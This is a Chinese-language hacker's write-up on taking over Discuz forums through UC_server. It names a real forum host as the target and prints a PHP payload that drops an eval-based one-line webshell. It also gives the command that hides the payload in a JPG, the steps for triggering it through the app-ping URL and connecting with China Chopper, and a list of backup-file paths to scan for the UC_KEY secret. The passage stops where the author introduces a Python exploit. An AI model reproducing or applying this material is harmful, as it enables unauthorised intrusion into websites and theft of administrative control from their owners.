今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下
Uc_server默认密码
其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码
可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿
先说一下UCkey拿shell,uckey可以进uc_server后台看
附一张dz3的图
当然有了uc-server的权限可以直接拿shell的
下面我演示直接拿shell
首先上传一张图片马到论坛
/data/attachment/forum/201511/07//174818npewlpqlzaepi9dw.jpg
图片木马制作:copy 1.jpg/b+1.txt/a 2.jpg
- txt内容
-
<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>
- 在当前目录下生成一句话f.php
应用管理 添加应用
添加应用
填好了内容之后,访问应用连接
http://newbbs.play.ifeng.com/uc_server/admin.php?m=app&a=ping&appid=【应用id】
应用id在应用列表里有
在uc_server目录下会生成f.php 密码f
菜刀连接之
下面讲利用uc_key拿shell
通常可以通过扫描这些文件获取Discuz的UC_KEY
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/config/config_global.php.zip
/config/config_global.php.rar
/config/config_global.tar.gz
/uc_server/data/config.inc.php.zip
/wwwroot.zip
/wwwroot.rar
/www.rar
/www.zip
/web.rar
/web.zip
/webbak.zip
UC_KEY在config/config_ucenter.php里面
Discuz X1.5 X2.5 X3用uc_key来get webshell
uc_key是UC客户端与服务端通信的通信密钥。因此使用uc_key来fetshell只能获取UCenter Client的webshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的(不过可以通过uc_key来将服务器上的数据并重置用户口令,后面讲)。
90分享的php版的exp代码,但uc_key和url是嵌入在代码中的,因此导致使用不方便。所以我将代码改成python版的,以后使用就方便了。代码如下: